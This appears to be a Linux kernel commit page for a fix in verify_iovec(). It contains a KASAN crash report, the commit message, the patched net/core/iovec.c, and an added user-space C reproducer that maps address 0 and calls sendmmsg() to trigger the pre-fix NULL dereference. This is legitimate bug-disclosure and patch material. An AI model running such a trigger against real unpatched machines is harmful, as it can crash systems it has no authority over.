Commit 40eea803c6 (from a mirror of https://github.com/torvalds/linux.git)
Sasha's report:
> While fuzzing with trinity inside a KVM tools guest running the latest -next
> kernel with the KASAN patchset, I've stumbled on the following spew:
>
> [ 4448.949424] ==================================================================
> [ 4448.951737] AddressSanitizer: user-memory-access on address 0
> [ 4448.952988] Read of size 2 by thread T19638:
> [ 4448.954510] CPU: 28 PID: 19638 Comm: trinity-c76 Not tainted 3.16.0-rc4-next-20140711-sasha-00046-g07d3099-dirty #813
> [ 4448.956823] ffff88046d86ca40 0000000000000000 ffff880082f37e78 ffff880082f37a40
> [ 4448.958233] ffffffffb6e47068 ffff880082f37a68 ffff880082f37a58 ffffffffb242708d
> [ 4448.959552] 0000000000000000 ffff880082f37a88 ffffffffb24255b1 0000000000000000
> [ 4448.961266] Call Trace:
> [ 4448.963158] dump_stack (lib/dump_stack.c:52)
> [ 4448.964244] kasan_report_user_access (mm/kasan/report.c:184)
> [ 4448.965507] __asan_load2 (mm/kasan/kasan.c:352)
> [ 4448.966482] ? netlink_sendmsg (net/netlink/af_netlink.c:2339)
> [ 4448.967541] netlink_sendmsg (net/netlink/af_netlink.c:2339)
> [ 4448.968537] ? get_parent_ip (kernel/sched/core.c:2555)
> [ 4448.970103] sock_sendmsg (net/socket.c:654)
> [ 4448.971584] ? might_fault (mm/memory.c:3741)
> [ 4448.972526] ? might_fault (./arch/x86/include/asm/current.h:14 mm/memory.c:3740)
> [ 4448.973596] ? verify_iovec (net/core/iovec.c:64)
> [ 4448.974522] ___sys_sendmsg (net/socket.c:2096)
> [ 4448.975797] ? put_lock_stats.isra.13 (./arch/x86/include/asm/preempt.h:98 kernel/locking/lockdep.c:254)
> [ 4448.977030] ? lock_release_holdtime (kernel/locking/lockdep.c:273)
> [ 4448.978197] ? lock_release_non_nested (kernel/locking/lockdep.c:3434 (discriminator 1))
> [ 4448.979346] ? check_chain_key (kernel/locking/lockdep.c:2188)
> [ 4448.980535] __sys_sendmmsg (net/socket.c:2181)
> [ 4448.981592] ? trace_hardirqs_on_caller (kernel/locking/lockdep.c:2600)
> [ 4448.982773] ? trace_hardirqs_on (kernel/locking/lockdep.c:2607)
> [ 4448.984458] ? syscall_trace_enter (arch/x86/kernel/ptrace.c:1500 (discriminator 2))
> [ 4448.985621] ? trace_hardirqs_on_caller (kernel/locking/lockdep.c:2600)
> [ 4448.986754] SyS_sendmmsg (net/socket.c:2201)
> [ 4448.987708] tracesys (arch/x86/kernel/entry_64.S:542)
> [ 4448.988929] ==================================================================
This report means that we've come to netlink_sendmsg() with msg->msg_name == NULL and msg->msg_namelen > 0.
After this report there was no usual "Unable to handle kernel NULL pointer dereference",
which gave me a clue that address 0 is mapped and contains a valid socket address structure.
This bug was introduced in commit f3d3342602
("net: rework recvmsg handler msg_name and msg_namelen logic"),
whose commit message states:
"Set msg->msg_name = NULL if user specified a NULL in msg_name but had a
non-null msg_namelen in verify_iovec/verify_compat_iovec. This doesn't
affect sendto as it would bail out earlier while trying to copy-in the
address."
But in fact this does affect sendto when address 0 is mapped and contains a
socket address structure: in that case the copy-in of the address succeeds,
and verify_iovec() returns successfully with msg->msg_namelen > 0
and msg->msg_name == NULL.
This patch fixes it by setting msg_namelen to 0 if msg_name == NULL.
Cc: Hannes Frederic Sowa <hannes@stressinduktion.org>
Cc: Eric Dumazet <edumazet@google.com>
Cc: <stable@vger.kernel.org>
Reported-by: Sasha Levin <sasha.levin@oracle.com>
Signed-off-by: Andrey Ryabinin <a.ryabinin@samsung.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
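
For context, the scenario the report describes can be reproduced from user space roughly as follows. This is a minimal sketch, not part of the patch: it assumes vm.mmap_min_addr is set to 0 so the zero page can be mapped (not a default setting), and it uses a netlink socket as in the trace above. On a fixed kernel the call is harmless, because verify_iovec() resets msg_namelen to 0.

#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <linux/netlink.h>

int main(void)
{
	/* Map the zero page (assumes vm.mmap_min_addr = 0) and place a
	 * plausible netlink address at address 0. */
	void *zero = mmap((void *)0, 4096, PROT_READ | PROT_WRITE,
			  MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
	if (zero == MAP_FAILED) {
		perror("mmap at address 0");
		return 1;
	}
	struct sockaddr_nl nladdr = { .nl_family = AF_NETLINK };
	memcpy(zero, &nladdr, sizeof(nladdr));

	int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE);
	if (fd < 0) {
		perror("socket");
		return 1;
	}

	/* msg_name == NULL but msg_namelen != 0: on a pre-fix kernel the
	 * copy-in from address 0 succeeds, msg_name stays NULL, and
	 * netlink_sendmsg() later reads through that NULL pointer. */
	char payload[16] = { 0 };
	struct iovec iov = { .iov_base = payload, .iov_len = sizeof(payload) };
	struct mmsghdr mmsg;
	memset(&mmsg, 0, sizeof(mmsg));
	mmsg.msg_hdr.msg_name = NULL;
	mmsg.msg_hdr.msg_namelen = sizeof(nladdr);
	mmsg.msg_hdr.msg_iov = &iov;
	mmsg.msg_hdr.msg_iovlen = 1;

	sendmmsg(fd, &mmsg, 1, 0);
	return 0;
}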
net/core/iovec.c (185 lines, 4.1 KiB, C)
/*
 *	iovec manipulation routines.
 *
 *
 *		This program is free software; you can redistribute it and/or
 *		modify it under the terms of the GNU General Public License
 *		as published by the Free Software Foundation; either version
 *		2 of the License, or (at your option) any later version.
 *
 *	Fixes:
 *		Andrew Lunn	:	Errors in iovec copying.
 *		Pedro Roque	:	Added memcpy_fromiovecend and
 *					csum_..._fromiovecend.
 *		Andi Kleen	:	fixed error handling for 2.1
 *		Alexey Kuznetsov:	2.1 optimisations
 *		Andi Kleen	:	Fix csum*fromiovecend for IPv6.
 */

#include <linux/errno.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/mm.h>
#include <linux/net.h>
#include <linux/in6.h>
#include <asm/uaccess.h>
#include <asm/byteorder.h>
#include <net/checksum.h>
#include <net/sock.h>

/*
 *	Verify iovec. The caller must ensure that the iovec is big enough
 *	to hold the message iovec.
 *
 *	Save time not doing access_ok. copy_*_user will make this work
 *	in any case.
 */

int verify_iovec(struct msghdr *m, struct iovec *iov, struct sockaddr_storage *address, int mode)
{
	int size, ct, err;

	if (m->msg_name && m->msg_namelen) {
		if (mode == VERIFY_READ) {
			void __user *namep;
			namep = (void __user __force *) m->msg_name;
			err = move_addr_to_kernel(namep, m->msg_namelen,
						  address);
			if (err < 0)
				return err;
		}
		m->msg_name = address;
	} else {
		m->msg_name = NULL;
		m->msg_namelen = 0;
	}

	size = m->msg_iovlen * sizeof(struct iovec);
	if (copy_from_user(iov, (void __user __force *) m->msg_iov, size))
		return -EFAULT;

	m->msg_iov = iov;
	err = 0;

	for (ct = 0; ct < m->msg_iovlen; ct++) {
		size_t len = iov[ct].iov_len;

		if (len > INT_MAX - err) {
			len = INT_MAX - err;
			iov[ct].iov_len = len;
		}
		err += len;
	}

	return err;
}

/*
 *	And now for the all-in-one: copy and checksum from a user iovec
 *	directly to a datagram
 *	Calls to csum_partial but the last must be in 32 bit chunks
 *
 *	ip_build_xmit must ensure that when fragmenting only the last
 *	call to this function will be unaligned also.
 */
int csum_partial_copy_fromiovecend(unsigned char *kdata, struct iovec *iov,
				   int offset, unsigned int len, __wsum *csump)
{
	__wsum csum = *csump;
	int partial_cnt = 0, err = 0;

	/* Skip over the finished iovecs */
	while (offset >= iov->iov_len) {
		offset -= iov->iov_len;
		iov++;
	}

	while (len > 0) {
		u8 __user *base = iov->iov_base + offset;
		int copy = min_t(unsigned int, len, iov->iov_len - offset);

		offset = 0;

		/* There is a remnant from previous iov. */
		if (partial_cnt) {
			int par_len = 4 - partial_cnt;

			/* iov component is too short ... */
			if (par_len > copy) {
				if (copy_from_user(kdata, base, copy))
					goto out_fault;
				kdata += copy;
				base += copy;
				partial_cnt += copy;
				len -= copy;
				iov++;
				if (len)
					continue;
				*csump = csum_partial(kdata - partial_cnt,
						      partial_cnt, csum);
				goto out;
			}
			if (copy_from_user(kdata, base, par_len))
				goto out_fault;
			csum = csum_partial(kdata - partial_cnt, 4, csum);
			kdata += par_len;
			base += par_len;
			copy -= par_len;
			len -= par_len;
			partial_cnt = 0;
		}

		if (len > copy) {
			partial_cnt = copy % 4;
			if (partial_cnt) {
				copy -= partial_cnt;
				if (copy_from_user(kdata + copy, base + copy,
						   partial_cnt))
					goto out_fault;
			}
		}

		if (copy) {
			csum = csum_and_copy_from_user(base, kdata, copy,
						       csum, &err);
			if (err)
				goto out;
		}
		len -= copy + partial_cnt;
		kdata += copy + partial_cnt;
		iov++;
	}
	*csump = csum;
out:
	return err;

out_fault:
	err = -EFAULT;
	goto out;
}
EXPORT_SYMBOL(csum_partial_copy_fromiovecend);

unsigned long iov_pages(const struct iovec *iov, int offset,
			unsigned long nr_segs)
{
	unsigned long seg, base;
	int pages = 0, len, size;

	while (nr_segs && (offset >= iov->iov_len)) {
		offset -= iov->iov_len;
		++iov;
		--nr_segs;
	}

	for (seg = 0; seg < nr_segs; seg++) {
		base = (unsigned long)iov[seg].iov_base + offset;
		len = iov[seg].iov_len - offset;
		size = ((base & ~PAGE_MASK) + len + ~PAGE_MASK) >> PAGE_SHIFT;
		pages += size;
		offset = 0;
	}

	return pages;
}
EXPORT_SYMBOL(iov_pages);
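
As a side note, the page-count expression in iov_pages() above, ((base & ~PAGE_MASK) + len + ~PAGE_MASK) >> PAGE_SHIFT, is just ceil((offset_within_page + len) / PAGE_SIZE). The following stand-alone user-space sketch mirrors that arithmetic; the sketch_iov_pages name and the hard-coded 4096-byte page are assumptions for illustration, not kernel API.

#include <stdio.h>
#include <sys/uio.h>

/* Illustration only: the kernel uses PAGE_SIZE/PAGE_SHIFT/PAGE_MASK. */
#define SK_PAGE_SHIFT 12
#define SK_PAGE_SIZE  (1UL << SK_PAGE_SHIFT)
#define SK_PAGE_MASK  (~(SK_PAGE_SIZE - 1))

static unsigned long sketch_iov_pages(const struct iovec *iov, int offset,
				      unsigned long nr_segs)
{
	unsigned long seg, base, len, pages = 0;

	for (seg = 0; seg < nr_segs; seg++) {
		base = (unsigned long)iov[seg].iov_base + offset;
		len = iov[seg].iov_len - offset;
		/* pages touched by [base, base + len) =
		 * ceil((offset_within_page + len) / page_size) */
		pages += ((base & ~SK_PAGE_MASK) + len + ~SK_PAGE_MASK)
				>> SK_PAGE_SHIFT;
		offset = 0;
	}
	return pages;
}

int main(void)
{
	static char a[200], b[10000];
	struct iovec iov[2] = {
		{ .iov_base = a, .iov_len = sizeof(a) },
		{ .iov_base = b, .iov_len = sizeof(b) },
	};

	/* 200 bytes span 1 or 2 pages and 10000 bytes span 3 or 4,
	 * depending on where each buffer happens to start. */
	printf("pages touched: %lu\n", sketch_iov_pages(iov, 0, 2));
	return 0;
}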